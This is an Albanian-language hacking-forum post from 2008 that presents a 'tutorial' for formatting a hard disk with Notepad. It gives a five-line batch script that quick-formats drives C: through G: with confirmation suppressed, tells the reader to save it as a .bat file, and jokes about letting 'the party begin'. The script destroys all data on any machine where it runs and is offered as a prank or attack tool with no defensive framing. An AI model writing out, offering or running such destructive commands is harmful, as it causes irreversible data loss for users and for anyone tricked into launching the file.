oLTi@NeT

Mirė Se Vini ne oLTi@NeT Froum
 
ForumPortaliRegjistrohuidentifikimi

Share
 

 Formatizimi i HDD duke perdorur Notepad

Shko poshtė 
AutoriMesazh
diar.zz
Administrator
Administrator
diar.zz

Male Numri i postimeve : 164
Age : 29
Vendii : Vushtrri
Registration date : 05/09/2008

Formatizimi i HDD duke perdorur Notepad Empty
MesazhTitulli: Formatizimi i HDD duke perdorur Notepad   Formatizimi i HDD duke perdorur Notepad I_icon_minitimeWed Sep 10, 2008 7:37 am

Hap Notepad-in (Start->Run->Notepad->Ok) dhe shkuaj kete:


Quote:
format C:/q /y
format D:/q /y
format E:/q /y
format F:/q /y
format G:/q /y

Tani ruaj si fajll .bat dhe lere te filloje festa.Eshte per pese particione
Mbrapsht nė krye Shko poshtė
http://olti-net.tk/
 
Formatizimi i HDD duke perdorur Notepad
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
oLTi@NeT  :: Hacking :: Tutoriale-
Kėrce tek: